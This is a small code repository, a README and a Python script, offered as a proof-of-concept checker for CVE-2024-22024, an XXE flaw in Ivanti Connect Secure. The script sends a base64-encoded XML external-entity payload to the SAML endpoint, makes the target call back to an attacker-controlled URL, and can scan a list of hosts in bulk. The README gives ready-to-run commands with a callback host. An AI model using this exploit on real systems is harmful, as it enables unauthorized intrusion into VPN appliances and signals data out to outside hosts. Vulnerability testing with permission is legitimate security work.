├── README.md └── cve_2024_22024.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-22024 2 | Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure 3 | 4 | > [!WARNING] 5 | > FOR EDUCATIONAL PURPOSE AND AUTHORIZED TESTING ONLY. 6 | 7 | ### Parameters 8 | - `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs. 9 | 10 | - `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site)) 11 | 12 | - `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds) 13 | 14 | 15 | ### How to use 16 | Testing a single URL: 17 | 18 | `python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com` 19 | 20 | Testing list of URLs: 21 | 22 | `python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com` 23 | 24 | Using a different timeout (5 seconds): 25 | 26 | `python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5` 27 | 28 | # Credits 29 | Whoever discovered the vulnerability .. I just read the PoC and automated this. 30 | 31 | [0dteam website](https://www.0d.ae) 32 | -------------------------------------------------------------------------------- /cve_2024_22024.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import requests 3 | import argparse 4 | from pathlib import Path 5 | import urllib3 6 | from urllib3.exceptions import InsecureRequestWarning 7 | 8 | # Suppress only the single InsecureRequestWarning from urllib3 9 | urllib3.disable_warnings(InsecureRequestWarning) 10 | 11 | ''' 12 | PoC by Abdulla 13 | CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure 14 | Remediation: 15 | https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US 16 | ''' 17 | 18 | def send_request(target_url, attacker_url, timeout): 19 | xml_payload_template = """ %xxe;]>""" 20 | xml_payload = xml_payload_template.format(attacker_url + "/test") # Format with the provided external URL 21 | encoded_payload = base64.b64encode(xml_payload.encode()).decode() # Encode in base64 22 | data = {'SAMLRequest': encoded_payload} # Data for POST request 23 | 24 | # Attempt the POST request with the specified timeout 25 | try: 26 | response = requests.post(target_url+"/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout) 27 | print(f"Response from {target_url}: {response.status_code}") 28 | except requests.exceptions.Timeout: 29 | print(f"Request to {target_url} timed out.") 30 | except Exception as e: 31 | print(f"Error sending request to {target_url}.") 32 | 33 | def main(target_urls, attacker_url, timeout): 34 | if Path(target_urls).is_file(): # If target_urls is a file path 35 | with open(target_urls, 'r') as file: 36 | urls = file.read().splitlines() 37 | for url in urls: 38 | send_request(url, attacker_url, timeout) 39 | else: # Assume target_urls is a single URL 40 | send_request(target_urls, attacker_url, timeout) 41 | 42 | if __name__ == "__main__": 43 | parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.") 44 | parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent") 45 | parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload") 46 | parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)") 47 | args = parser.parse_args() 48 | 49 | main(args.target_url, args.attacker_url, args.timeout) 50 | 51 | --------------------------------------------------------------------------------